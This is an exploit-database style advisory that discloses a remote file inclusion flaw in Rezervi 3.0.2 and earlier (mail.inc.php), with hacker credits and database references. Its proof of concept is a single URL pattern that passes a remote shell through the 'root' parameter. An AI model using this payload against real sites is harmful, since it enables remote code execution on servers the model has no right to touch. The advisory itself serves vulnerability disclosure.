

| Risk |
Local |
| Remote |
| Medium |
No |
| Yes |
###############################################################
## Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablities ##
## http://www.rezervi.com ##
###############################################################
###############################################################
Discovered : r00t.h4x0r <r00t.h4x0r[!]hotmail.com>
Homepage : !n y0ur m!nd
###############################################################
PoC r00t :
[r00t.h4x0r]/include/mail.inc.php?root=[Shell]
###############################################################
9r33tz : cr4wl3r
###############################################################
#################### [ INDONESIAN HACKER ] ####################
References:
http://xforce.iss.net/xforce/xfdb/55341
http://www.vupen.com/english/advisories/2010/0016
http://www.securityfocus.com/bid/37589
http://www.exploit-db.com/exploits/10967
http://secunia.com/advisories/38118
http://packetstormsecurity.org/1001-exploits/rezervi-rfi.txt
http://osvdb.org/61450
[ ASCII VERSION ]
|